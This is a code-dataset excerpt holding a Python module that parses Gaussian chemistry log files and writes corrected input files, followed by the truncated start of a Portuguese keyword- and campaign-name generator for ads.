\"+keywords_opt+\"\\n\")\n\tfileout.write(\"\\n\")\n\tfileout.write(name+\"\\n\")\n\tfileout.write(str(CHARGE)+' 
'+str(MULT)+'\\n')\n\tfor atom in range(0,NATOMS):\n\t\tfileout.write('{0:>2} {1:12.8f} {2:12.8f} {3:12.8f}'.format(ATOMTYPES[atom], CARTESIANS[atom][0], CARTESIANS[atom][1], CARTESIANS[atom][2]))\n\t\tfileout.write(\"\\n\")\n\tfileout.write(\"\\n\")\n\ndef write_genecp(fileout,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,bs_com,lot_com,bs_gcp_com,args,w_dir_initial,w_dir):\n\tfor _,element_ecp in enumerate(ecp_list):\n\t\t# write only the elements that belong to neither ECP list ('not in (a or b)' only checked the first non-empty list)\n\t\tif element_ecp not in args.genecp_atoms and element_ecp not in args.gen_atoms:\n\t\t\tfileout.write(element_ecp+' ')\n\tfileout.write('0\\n')\n\tfileout.write(bs_com+'\\n')\n\tfileout.write('****\\n')\n\n\tif len(bs_gcp_com.split('.')) > 1:\n\t\tif bs_gcp_com.split('.')[1] == 'txt' or bs_gcp_com.split('.')[1] == 'yaml':\n\t\t\tos.chdir(w_dir_initial)\n\t\t\tread_lines = open(bs_gcp_com,\"r\").readlines()\n\t\t\tos.chdir(w_dir)\n\t\t\t#getting the title line\n\t\t\tfor line in read_lines:\n\t\t\t\tfileout.write(line)\n\t\t\tfileout.write('\\n\\n')\n\telse:\n\t\tfor _,element_ecp in enumerate(ecp_list):\n\t\t\tif element_ecp in args.genecp_atoms :\n\t\t\t\tfileout.write(element_ecp+' ')\n\t\t\telif element_ecp in args.gen_atoms :\n\t\t\t\tfileout.write(element_ecp+' ')\n\t\tfileout.write('0\\n')\n\t\tfileout.write(bs_gcp_com+'\\n')\n\t\tfileout.write('****\\n\\n')\n\t\tif ecp_genecp_atoms:\n\t\t\tfor _,element_ecp in enumerate(ecp_list):\n\t\t\t\tif element_ecp in args.genecp_atoms:\n\t\t\t\t\tfileout.write(element_ecp+' ')\n\t\t\tfileout.write('0\\n')\n\t\t\tfileout.write(bs_gcp_com+'\\n\\n')\n\n# CREATION OF COM FILES\ndef new_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs_com,lot_com,bs_gcp_com):\n\tif args.sp:\n\t\tif args.suffix_sp is None:\n\t\t\tfileout = open(file.split(\".\")[0]+'-'+lot_com+'-'+bs_com+'.com', \"w\")\n\t\telse:\n\t\t\tfileout = open(file.split(\".\")[0]+'-'+args.suffix_sp+'-'+lot_com+'-'+bs_com+'.com', \"w\")\n\telse:\n\t\tfileout = open(file.split(\".\")[0]+'.com', \"w\")\n\n\twrite_header_and_coords(fileout,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS)\n\n\tif genecp == 'genecp' or genecp == 'gen':\n\t\twrite_genecp(fileout,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,bs_com,lot_com,bs_gcp_com,args,w_dir_initial,w_dir)\n\n\tif args.sp and TERMINATION == \"normal\" and IM_FREQS == 0 :\n\t\tfileout.write(args.last_line_for_sp)\n\t\tfileout.write('\\n\\n')\n\n\tfileout.close()\n\ndef read_log_file(w_dir,file):\n\tbreak_loop = False\n\tos.chdir(w_dir)\n\ttry:\n\t\toutfile = open(file,\"r\")\n\texcept FileNotFoundError:\n\t\t# return early: the file is missing, so there is no handle to read from\n\t\treturn [], None, True\n\toutlines = outfile.readlines()\n\n\treturn outlines, outfile, break_loop\n\ndef get_initial_variables():\n\trms = 10000\n\tstop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,dist_rot_or = 0,0,0,0,0,0,0,0,0\n\tATOMTYPES, CARTESIANS, FREQS, READMASS, FORCECONST, NORMALMODE = [],[],[],[],[],[]\n\tTERMINATION,ERRORTYPE = 'unfinished','unknown'\n\n\treturn rms,stop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,ATOMTYPES,CARTESIANS,FREQS,READMASS,FORCECONST,NORMALMODE,TERMINATION,ERRORTYPE,dist_rot_or\n\ndef get_name_charge_multiplicity(outlines,stop_name):\n\t# only for name and charge\n\tfor i,outline in enumerate(outlines):\n\t\tif stop_name == 2:\n\t\t\tbreak\n\t\t# Get the name of the compound (specified in the title)\n\t\tif outline.find('Symbolic Z-matrix:') > -1:\n\t\t\tname = outlines[i-2]\n\t\t\tstop_name += 1\n\t\t# Determine charge 
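# --- The early-return shape used in the fixed read_log_file above, as a hedged,
# self-contained sketch; the function name and return convention are illustrative,
# not part of the original module.
def read_lines_or_flag(path):
    try:
        with open(path) as fh:       # the handle is closed by the context manager
            return fh.readlines(), False
    except FileNotFoundError:
        return [], True              # nothing was opened, so nothing to read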
and multiplicity\n\t\tif outline.find(\"Charge = \") > -1:\n\t\t\tCHARGE = int(outline.split()[2])\n\t\t\tMULT = int(outline.split()[5].rstrip(\"\\n\"))\n\t\t\tstop_name += 1\n\treturn name, CHARGE, MULT\n\ndef get_termination_type(outlines,stop_term,TERMINATION,ERRORTYPE):\n\t# use reversed loops to find type of termination (faster than forward loops)\n\tfor i in reversed(range(len(outlines)-15,len(outlines))):\n\t\tif stop_term == 1:\n\t\t\tbreak\n\t\t# Determine the kind of job termination\n\t\tif outlines[i].find(\"Normal termination\") > -1:\n\t\t\tTERMINATION = \"normal\"\n\t\t\tstop_term += 1\n\t\telif outlines[i].find(\"Error termination\") > -1:\n\t\t\tTERMINATION = \"error\"\n\t\t\tif outlines[i-1].find(\"Atomic number out of range\") > -1 or outlines[i-1].find(\"basis sets are only available\") > -1 :\n\t\t\t\tERRORTYPE = \"atomicbasiserror\"\n\t\t\tif outlines[i-3].find(\"SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error\") > -1:\n\t\t\t\tERRORTYPE = \"SCFerror\"\n\t\t\tstop_term += 1\n\treturn TERMINATION,ERRORTYPE\n\ndef get_geom_and_freq_for_normal(outlines, args, TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or):\n\tstop_get_details_stand_or, stop_get_details_dis_rot,finding_freq_line,stop_finding_freq_line = 0,0,0,0\n\t# reverse loop to speed up the reading of the output files\n\tfor i in reversed(range(0,len(outlines))):\n\t\tif TERMINATION == \"normal\":\n\t\t\tif not args.frequencies:\n\t\t\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1:\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1 and stop_finding_freq_line ==1 :\n\t\t\t\t\tbreak\n\t\t\t# Sets where the final coordinates are inside the file\n\t\t\tif stop_get_details_dis_rot !=1 and (outlines[i].find(\"Distance matrix\") > -1 or outlines[i].find(\"Rotational constants\") >-1) :\n\t\t\t\tif outlines[i-1].find(\"-------\") > -1:\n\t\t\t\t\tdist_rot_or = i\n\t\t\t\t\tstop_get_details_dis_rot += 1\n\t\t\tif outlines[i].find(\"Standard orientation\") > -1 and stop_get_details_stand_or !=1 :\n\t\t\t\tstand_or = i\n\t\t\t\tNATOMS = dist_rot_or-i-6\n\t\t\t\tstop_get_details_stand_or += 1\n\t\t\tif args.frequencies:\n\t\t\t\tif outlines[i].find(\" Harmonic frequencies\") > -1 and stop_finding_freq_line !=1 :\n\t\t\t\t\tfinding_freq_line = i\n\n\tif args.frequencies:\n\t\tfor i in range(finding_freq_line,len(outlines)):\n\t\t\t# Get the frequencies and identifies negative frequencies\n\t\t\tif outlines[i].find(\" Frequencies -- \") > -1:\n\t\t\t\tnfreqs = len(outlines[i].split())\n\t\t\t\tfor j in range(2, nfreqs):\n\t\t\t\t\tFREQS.append(float(outlines[i].split()[j]))\n\t\t\t\t\tNORMALMODE.append([])\n\t\t\t\t\tif float(outlines[i].split()[j]) < 0.0:\n\t\t\t\t\t\tIM_FREQS += 1\n\t\t\t\tfor j in range(3, nfreqs+1):\n\t\t\t\t\tREADMASS.append(float(outlines[i+1].split()[j]))\n\t\t\t\tfor j in range(3, nfreqs+1):\n\t\t\t\t\tFORCECONST.append(float(outlines[i+2].split()[j]))\n\t\t\t\tfor j in range(0,NATOMS):\n\t\t\t\t\tfor k in range(0, nfreqs-2):\n\t\t\t\t\t\tNORMALMODE[(freqs_so_far + k)].append([float(outlines[i+5+j].split()[3*k+2]), float(outlines[i+5+j].split()[3*k+3]), float(outlines[i+5+j].split()[3*k+4])])\n\t\t\t\tfreqs_so_far = freqs_so_far + nfreqs - 2\n\t\t\tif TERMINATION != \"normal\":\n\t\t\t\tif outlines[i].find('Cartesian Forces: Max') > -1:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif float(outlines[i].split()[5]) < 
rms:\n\t\t\t\t\t\t\trms = float(outlines[i].split()[5])\n\t\t\t\t\t\t\tstop_rms = i\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\trms = 10000\n\treturn TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or\n\ndef get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS):\n\tfor i in range(stand_or+5,stand_or+5+NATOMS):\n\t\tmassno = int(outlines[i].split()[1])\n\t\tif massno < len(possible_atoms):\n\t\t\tatom_symbol = possible_atoms[massno]\n\t\telse:\n\t\t\tatom_symbol = \"XX\"\n\t\tATOMTYPES.append(atom_symbol)\n\t\tCARTESIANS.append([float(outlines[i].split()[3]), float(outlines[i].split()[4]), float(outlines[i].split()[5])])\n\n\treturn ATOMTYPES, CARTESIANS\n\ndef get_coords_not_normal(outlines, stop_rms, stand_or, dist_rot_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS):\n\tif stop_rms == 0:\n\t\tlast_line = len(outlines)\n\telse:\n\t\tlast_line = stop_rms\n\tstop_get_details_stand_or = 0\n\tstop_get_details_dis_rot = 0\n\tfor i in reversed(range(0,last_line)):\n\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1:\n\t\t\tbreak\n\t\t# Sets where the final coordinates are inside the file\n\t\tif outlines[i].find(\"Standard orientation\") > -1 and stop_get_details_stand_or != 1:\n\t\t\tstand_or = i\n\t\t\tNATOMS = dist_rot_or-i-6\n\t\t\tstop_get_details_stand_or += 1\n\t\tif stop_get_details_stand_or != 1 and (outlines[i].find(\"Distance matrix\") > -1 or outlines[i].find(\"Rotational constants\") >-1):\n\t\t\tif outlines[i-1].find(\"-------\") > -1:\n\t\t\t\tdist_rot_or = i\n\t\t\t\tstop_get_details_dis_rot += 1\n\n\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\n\treturn ATOMTYPES, CARTESIANS, NATOMS\n\ndef fix_imag_freqs(NATOMS, CARTESIANS, args, FREQS, NORMALMODE):\n\t# Multiplies the imaginary normal mode vector by this amount (from -1 to 1).\n\tamplitude = args.amplitude_ifreq # 0.2 is the default in the pyQRC script (GitHub, user: bobbypaton)\n\tshift = []\n\n\t# Save the original Cartesian coordinates before they are altered\n\torig_carts = []\n\tfor atom in range(0,NATOMS):\n\t\torig_carts.append([CARTESIANS[atom][0], CARTESIANS[atom][1], CARTESIANS[atom][2]])\n\n\t# could get rid of atomic units here, if zpe_rat definition is changed\n\tfor mode,_ in enumerate(FREQS):\n\t\t# Either moves along any and all imaginary freqs, or a specific mode requested by the user\n\t\tif FREQS[mode] < 0.0:\n\t\t\tshift.append(amplitude)\n\t\telse:\n\t\t\tshift.append(0.0)\n\n\t\t# The starting geometry is displaced along each normal mode according to the random shift\n\t\tfor atom in range(0,NATOMS):\n\t\t\tfor coord in range(0,3):\n\t\t\t\tCARTESIANS[atom][coord] = CARTESIANS[atom][coord] + NORMALMODE[mode][atom][coord] * shift[mode]\n\n\treturn CARTESIANS\n\ndef create_folder_and_com(w_dir,log,NATOMS,ATOMTYPES,CARTESIANS,args,TERMINATION,IM_FREQS,w_dir_fin,file,lot,bs,bs_gcp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp,ERRORTYPE,input_route,w_dir_initial,name,CHARGE,MULT):\n\t# creating new folder with new input gaussian files\n\tnew_gaussian_input_files = w_dir+'/new_gaussian_input_files/'\n\n\ttry:\n\t\tos.makedirs(new_gaussian_input_files)\n\texcept OSError:\n\t\tif os.path.isdir(new_gaussian_input_files):\n\t\t\tos.chdir(new_gaussian_input_files)\n\t\telse:\n\t\t\traise\n\tos.chdir(new_gaussian_input_files)\n\tlog.write('-> Creating new gaussian input file for {0} in 
{1}/{2}'.format(file,lot,bs))\n\n\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t#error if both genecp and gen are\n\tif ecp_genecp_atoms and ecp_gen_atoms:\n\t\tsys.exit(\"ERROR: Can't use Gen and GenECP at the same time\")\n\n\tif ERRORTYPE == 'SCFerror':\n\t\tinput_route += ' scf=qc'\n\tif genecp == 'genecp' or genecp == 'gen':\n\t\tkeywords_opt = lot +'/'+ genecp+' '+ input_route\n\telse:\n\t\tkeywords_opt = lot +'/'+ bs +' '+ input_route\n\n\tnew_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs,lot,bs_gcp)\n\ndef create_folder_move_log_files(w_dir,file,IM_FREQS,TERMINATION,ERRORTYPE,w_dir_fin):\n\tsource = w_dir+'/'+file\n\n\tif IM_FREQS == 0 and TERMINATION == \"normal\":\n\t\tdestination = w_dir_fin\n\t\tmoving_log_files(source, destination, file)\n\n\tif IM_FREQS > 0:\n\t\tdestination = w_dir+'/imaginary_frequencies/'\n\t\tmoving_log_files(source, destination, file)\n\n\tif IM_FREQS == 0 and TERMINATION == \"error\":\n\t\tif ERRORTYPE == \"atomicbasiserror\":\n\t\t\tdestination = w_dir+'/failed_error/atomic_basis_error'\n\t\telif ERRORTYPE == \"SCFerror\":\n\t\t\tdestination = w_dir+'/failed_error/SCF_error'\n\t\telse:\n\t\t\tdestination = w_dir+'/failed_error/unknown_error'\n\t\tmoving_log_files(source, destination, file)\n\n\telif IM_FREQS == 0 and TERMINATION == \"unfinished\":\n\t\tdestination = w_dir+'/failed_unfinished/'\n\t\tmoving_log_files(source, destination, file)\n\n# DEFINTION OF OUTPUT ANALYSER and NMR FILES CREATOR\ndef output_analyzer(log_files, w_dir, lot, bs, bs_gcp, args, w_dir_fin, w_dir_initial, log):\n\n\tinput_route = input_route_line(args)\n\n\tfor file in log_files:\n\t\t# read the file\n\t\toutlines, outfile, break_loop = read_log_file(w_dir,file)\n\t\tif break_loop:\n\t\t\tbreak\n\t\t# get initial parameters\n\t\trms,stop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,ATOMTYPES,CARTESIANS,FREQS,READMASS,FORCECONST,NORMALMODE,TERMINATION,ERRORTYPE,dist_rot_or = get_initial_variables()\n\n\t\t# get name, charge and multiplicity\n\t\tname, CHARGE, MULT = get_name_charge_multiplicity(outlines,stop_name)\n\n\t\t# get termination type\n\t\tTERMINATION,ERRORTYPE = get_termination_type(outlines,stop_term,TERMINATION,ERRORTYPE)\n\n\t\t# get geometry parameters and frequency information\n\t\tTERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or = get_geom_and_freq_for_normal(outlines, args, TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or)\n\n\t\t# Get the coordinates for jobs that finished well with and without imag. 
freqs\n\t\tif TERMINATION == \"normal\" and IM_FREQS>0:\n\t\t\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\n\t\t# Get the coordinates for jobs that did not finish or finished with an error\n\t\tif TERMINATION != \"normal\":\n\t\t\tATOMTYPES, CARTESIANS,NATOMS = get_coords_not_normal(outlines, stop_rms, stand_or, dist_rot_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\t\t# This part fixes imaginary freqs (if any)\n\t\tif IM_FREQS > 0:\n\t\t\tCARTESIANS = fix_imag_freqs(NATOMS, CARTESIANS, args, FREQS, NORMALMODE)\n\n\t\t#close the file\n\t\toutfile.close()\n\n\t\t# This part places the calculations in different folders depending on the type of termination\n\t\tcreate_folder_move_log_files(w_dir,file,IM_FREQS,TERMINATION,ERRORTYPE,w_dir_fin)\n\n\t\t# check if gen or genecp are active\n\t\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t\t# create folders and set level of theory in COM files to fix imaginary freqs or not normal terminations\n\t\tif (IM_FREQS > 0 or TERMINATION != \"normal\") and not os.path.exists(w_dir+'/failed_error/atomic_basis_error/'+file):\n\t\t\tcreate_folder_and_com(w_dir,log,NATOMS,ATOMTYPES,CARTESIANS,args,TERMINATION,IM_FREQS,w_dir_fin,file,lot,bs,bs_gcp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp,ERRORTYPE,input_route,w_dir_initial,name,CHARGE, MULT)\n\n\t\t# adding in the NMR component only to the finished files after reading from normally finished log files\n\t\tif args.sp and TERMINATION == \"normal\" and IM_FREQS == 0:\n\t\t\t#get coordinates\n\t\t\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\t\t\t# creating new folder with new input gaussian files\n\t\t\tsingle_point_input_files = w_dir_fin+'/single_point_input_files'\n\t\t\t# Options for genecp\n\t\t\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t\t\t# Sets the folder and find the log files to analyze\n\t\t\tfor lot_sp in args.level_of_theory_sp:\n\t\t\t\tfor bs_sp in args.basis_set_sp:\n\t\t\t\t\tfor bs_gcp_sp in args.basis_set_genecp_atoms_sp:\n\t\t\t\t\t\tlog.write('-> Creating new single point files for {0} in {1}/{2}\\n'.format(file,lot_sp,bs_sp))\n\t\t\t\t\t\tfolder = single_point_input_files + '/' + str(lot_sp) + '-' + str(bs_sp)\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tos.makedirs(folder)\n\t\t\t\t\t\t\tos.chdir(folder)\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tif os.path.isdir(folder):\n\t\t\t\t\t\t\t\tos.chdir(folder)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\traise\n\t\t\t\t\t\tif genecp == 'genecp' or genecp == 'gen':\n\t\t\t\t\t\t\tif args.dispersion_correction_sp:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' empiricaldispersion={0}'.format(args.empirical_dispersion_sp)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) empiricaldispersion={2} '.format(args.solvent_model_sp,args.solvent_name_sp,args.empirical_dispersion_sp)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) '.format(args.solvent_model_sp,args.solvent_name_sp)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif 
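# --- Why the parentheses added above matter: 'and' binds tighter than 'or' in
# Python, so the unparenthesized condition grouped as `A or (B and C)`. The
# values below are an illustrative truth-table check only.
A, B, C = True, False, False
assert (A or B and C) is True        # original grouping: A or (B and C)
assert ((A or B) and C) is False     # the intended grouping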
args.dispersion_correction_sp:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' empiricaldispersion={0}'.format(args.empirical_dispersion_sp)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) empiricaldispersion={2} '.format(args.solvent_model_sp,args.solvent_name_sp,args.empirical_dispersion_sp)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) '.format(args.solvent_model_sp,args.solvent_name_sp)\n\t\t\t\t\t\tif args.sp:\n\t\t\t\t\t\t\tif args.charge_sp is not None:\n\t\t\t\t\t\t\t\tCHARGE = args.charge_sp\n\t\t\t\t\t\t\tif args.mult_sp is not None:\n\t\t\t\t\t\t\t\tMULT = args.mult_sp\n\t\t\t\t\t\tnew_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs_sp,lot_sp,bs_gcp_sp)\n\n# CHECKS THE FOLDER OF FINAL LOG FILES\ndef check_for_final_folder(w_dir,log):\n\tdir_found = False\n\twhile not dir_found:\n\t\ttemp_dir = w_dir+'/new_gaussian_input_files'\n\t\tif os.path.isdir(temp_dir):\n\t\t\tw_dir = temp_dir\n\t\telse:\n\t\t\tdir_found =True\n\treturn w_dir\n\n# CHECKING FOR DUPLICATES\ndef dup_calculation(val,w_dir, args,log):\n\n\t# GoodVibes must be installed as a module (through pip or conda)\n\tcmd_dup = ['python', '-m', 'goodvibes', '--dup']\n\tfor file in val:\n\t\tcmd_dup.append(file)\n\tsubprocess.call(cmd_dup)\n\n\t#reading the txt files to get the DUPLICATES\n\tdup_file_list = []\n\tduplines = open('Goodvibes_output.dat',\"r\").readlines()\n\n\tfor i,_ in enumerate(duplines):\n\t\tif duplines[i].find('duplicate') > -1:\n\t\t\tdup_file_list.append(duplines[i].split(' ')[2])\n\n\t#move the files to specific directory\n\tdestination = w_dir+'/Duplicates/'\n\tfor source in dup_file_list:\n\t\t#finding the extension\n\t\tfor file in val:\n\t\t\tif file.split('.')[0] == source:\n\t\t\t\text=file.split('.')[1]\n\t\tsource=source+'.'+ext\n\t\ttry:\n\t\t\tos.makedirs(destination)\n\t\t\tshutil.move(source, destination)\n\t\texcept OSError:\n\t\t\tif os.path.isdir(destination) and not os.path.exists(destination):\n\t\t\t\tshutil.move(source, destination)\n\t\t\telse:\n\t\t\t\traise\n","sub_path":"pyconfort/analyzer_functions.py","file_name":"analyzer_functions.py","file_ext":"py","file_size_in_byte":19580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"612323558","text":"from fileUtils import *\r\nimport os\r\nfrom datetime import datetime\r\nimport re\r\n\r\nMIN_TAIL = 2\r\n\r\nconectors = initConectors()\r\nprint(conectors)\r\n\r\ndef genCampaigns(camps):\r\n campaigns = []\r\n for midia in camps[0]:\r\n for objetivo in camps[1]:\r\n for local in camps[2]:\r\n sigla = \"\"\r\n if len(local) < 3:\r\n rg = local\r\n sigla = local\r\n else:\r\n rg = local.replace(\"de\",\"\").split(\" \")\r\n for part in rg:\r\n if len(part) > 0:\r\n sigla += part[0]\r\n for estrategia in camps[3]:\r\n for ordem in camps[4]:\r\n ordem = \"%03d\" %int(ordem)\r\n for alvo in camps[5]:\r\n for carreira in camps[6]:\r\n campaign = \"-\".join( [midia, objetivo, sigla.lower(),\r\n estrategia, ordem, alvo, carreira] )\r\n\r\n campaigns.append(campaign)\r\n return 
campaigns\r\n\r\ndef genAdgroups(n, n_max = 3000):\r\n adg_name = input(\"Digite o radical para compor o Adgroup: \")\r\n\r\n i = 0\r\n adgroups = []\r\n while i < n:\r\n adgroups.append(adg_name + \"-%04d\" %(i // n_max))\r\n i += n_max\r\n return adgroups\r\n\r\ndef genSKAG(c, seeds):\r\n print()\r\n print(\"1 CTA\")\r\n print(\"2 Genéricos\")\r\n print(\"3 Cargo\")\r\n print(\"4 Qualidade\")\r\n print(\"5 Curso\")\r\n print(\"6 Linguagem\")\r\n print(\"7 Framework\")\r\n print(\"8 Área\")\r\n print(\"9 Device\")\r\n print(\"10 Plataforma\")\r\n print(\"11 Serviços\")\r\n print(\"12 Senioridade\")\r\n print(\"13 Local\")\r\n anchor = int(input(\"Digite o nome da coluna de referência: \"))\r\n anchor = anchor - 1\r\n\r\n skagControl = loadSKAGControl(c)\r\n\r\n if skagControl is None:\r\n return None\r\n\r\n lastVersion = skagControl[\"versions\"][-1]\r\n newVersion = {\"adgroups\":{},\"date\":datetime.now().strftime(\"%d/%m/%y %H:%M\")}\r\n\r\n for adgroup_name in lastVersion[\"adgroups\"]:\r\n newVersion[\"adgroups\"][adgroup_name] = lastVersion[\"adgroups\"][adgroup_name]\r\n\r\n skags = []\r\n\r\n for anchorSeed in seeds[anchor]:\r\n seedGroup = []\r\n for i in range(len(seeds)):\r\n if i != anchor:\r\n seedGroup.append(seeds[i])\r\n else:\r\n seedGroup.append([anchorSeed])\r\n skag_fname = \"_tempSKAG_%s.csv\" %anchorSeed\r\n\r\n generatedSeeds = genKeywords(seedGroup, skag_fname, passUser = True, returnSeed = True)\r\n\r\n keywords = [cleanGenerated(k) for k in generatedSeeds]\r\n\r\n os.remove(skag_fname)\r\n\r\n anchorSeed = anchorSeed.replace(\"-\",\"_\")\r\n print(anchorSeed)\r\n cores = {}\r\n for i in range (len(keywords)):\r\n keyword = keywords[i]\r\n keywordCore = keyword\r\n for word in conectors:\r\n keywordCore = keywordCore.replace(\" \" + word + \" \", \" \")\r\n\r\n if keywordCore not in cores:\r\n if anchorSeed in newVersion[\"adgroups\"]:\r\n newVersion[\"adgroups\"][anchorSeed] += 1\r\n cores[keywordCore] = \"-%04d\" %newVersion[\"adgroups\"][anchorSeed]\r\n else:\r\n newVersion[\"adgroups\"][anchorSeed] = 0\r\n cores[keywordCore] = \"-%04d\" %newVersion[\"adgroups\"][anchorSeed]\r\n adg_associate = cores[keywordCore]\r\n\r\n entry = {\r\n \"keyword\" : keyword,\r\n \"adg_name\" : anchorSeed + adg_associate,\r\n \"seed\" : generatedSeeds[i]\r\n }\r\n print(\"\\t%s (%s)\" %(entry[\"keyword\"], entry[\"adg_name\"]))\r\n skags.append(entry)\r\n\r\n skagControl[\"versions\"].append(newVersion)\r\n saveSKAGControl(skagControl)\r\n\r\n return skags\r\n\r\ndef cleanGenerated(seed):\r\n for i in range(len(seed)):\r\n if seed[i] == \"*\":\r\n seed[i] = \"\"\r\n # Count the non-empty entries:\r\n notNull = 0\r\n for s in seed:\r\n if s != '':\r\n notNull += 1\r\n # Tail-length limit:\r\n #if notNull < MIN_TAIL:\r\n #return None\r\n seedString = \" \".join(seed) + \"\\r\\n\"\r\n # Collapse double spaces\r\n while(True):\r\n newSeed = seedString.replace(\"  \", \" \")\r\n if newSeed == seedString:\r\n break\r\n else:\r\n seedString = newSeed\r\n # Strip leading and trailing spaces\r\n if seedString[0] == \" \":\r\n seedString = seedString[1:len(seedString)]\r\n if seedString[-1] == \" \":\r\n seedString = seedString[0:-1]\r\n\r\n seedString = seedString.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\r\n\r\n return seedString\r\n\r\ndef genKeywords(seeds, out_filename=\"_temp_genKeywords.csv\", passUser = False,\r\n returnSeed = False):\r\n prev = 1\r\n if returnSeed:\r\n toReturn = []\r\n for col in seeds:\r\n prev *= len(col)\r\n if not passUser:\r\n print(\"Vai gerar %d combinações. 
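# --- The double-space loop in cleanGenerated, expressed as a one-line regex
# equivalent; this is an alternative sketch, not a claim about the original design.
import re
assert re.sub(r' {2,}', ' ', 'a  b   c') == 'a b c'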
Pressione Enter para continuar\" %prev)\r\n input()\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo temporário %s!\" %out_filename)\r\n sys.exit(0)\r\n n = 0\r\n for cta in seeds[0]:\r\n for generic in seeds[1]:\r\n for cargo in seeds[2]:\r\n for qualidade in seeds[3]:\r\n for curso in seeds[4]:\r\n for linguagem in seeds[5]:\r\n for framework in seeds[6]:\r\n for area in seeds[7]:\r\n for device in seeds[8]:\r\n for plataforma in seeds[9]:\r\n for servicos in seeds[10]:\r\n for senioridade in seeds[11]:\r\n for local in seeds[12]:\r\n seed = [cta, generic, cargo, qualidade,\r\n curso, linguagem, framework, area, device,\r\n plataforma, servicos, senioridade, local]\r\n if returnSeed:\r\n toReturn.append(seed)\r\n else:\r\n seedString = cleanGenerated(seed)\r\n if 